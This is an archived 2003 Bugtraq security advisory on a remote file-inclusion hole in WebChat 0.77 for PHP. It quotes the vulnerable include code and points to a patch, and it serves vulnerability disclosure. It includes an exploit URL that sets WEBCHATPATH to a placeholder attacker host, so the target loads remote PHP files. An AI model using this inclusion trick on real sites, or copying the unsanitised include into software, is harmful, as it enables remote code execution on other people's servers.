WebChat (PHP)

From: Frog Man (leseulfrog@hotmail.com)
Date: 03/03/03

  • Next message: MightyE: "Re: Netscape Communicator 4.x sensitive informations in configuration file" 
    From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Mon, 03 Mar 2003 13:57:43 +0100

    Informations :
    °°°°°°°°°°°°°°
    Version : 0.77
    Website : http://www.webdev.ro
    Problem : File Including

    PHP Code/Location :
    °°°°°°°°°°°°°°°°°°°
    defines.php :
    -----------------------------------------------
    <?
    if (!isset($WEBCHATPATH)) {
             $WEBCHATPATH = './';
    }
    include ($WEBCHATPATH.'db_mysql.php');
    include ($WEBCHATPATH.'language/english.php');
    [...]
    -----------------------------------------------

    Exploits :
    °°°°°°°°°°
    http://[target]/defines.php?WEBCHATPATH=http://[attacker]/
    with :
    http://[attacker]/db_mysql.php and
    http://[attacker]/language/english.php

    Patch :
    °°°°°°°
    A patch can be found on http://www.phpsecure.info (-> New Version !! :))

    More Details :
    °°°°°°°°°°°°°°
    In French :
    http://www.frog-man.org/tutos/WebChat.txt

    frog-m@n

    _________________________________________________________________
    MSN Messenger : discutez en direct avec vos amis !
    http://messenger.fr.msn.be

  • Next message: MightyE: "Re: Netscape Communicator 4.x sensitive informations in configuration file"

    Relevant Pages

    • Video card - AGP 8x???
      ... MSN Messenger: discutez en direct avec vos amis! ...
      (Debian-User)
    • WAnewsletter (PHP)
      ... Website: http://www.phpcodeur.net ... discutez en direct avec vos amis! ...
      (Bugtraq)
    • [VulnWatch] WebChat (PHP)
      ... Website: http://www.webdev.ro ... discutez en direct avec vos amis! ...
      (VulnWatch)
    • PEEL (PHP)
      ... Website: http://www.mapetite-entreprise.com ... PHP Code/Location: ... discutez en direct avec vos amis! ...
      (Bugtraq)
    • D-Forum (PHP)
      ... Website: http://www.adalis.fr/adalis.html ... discutez en direct avec vos amis! ...
      (Bugtraq)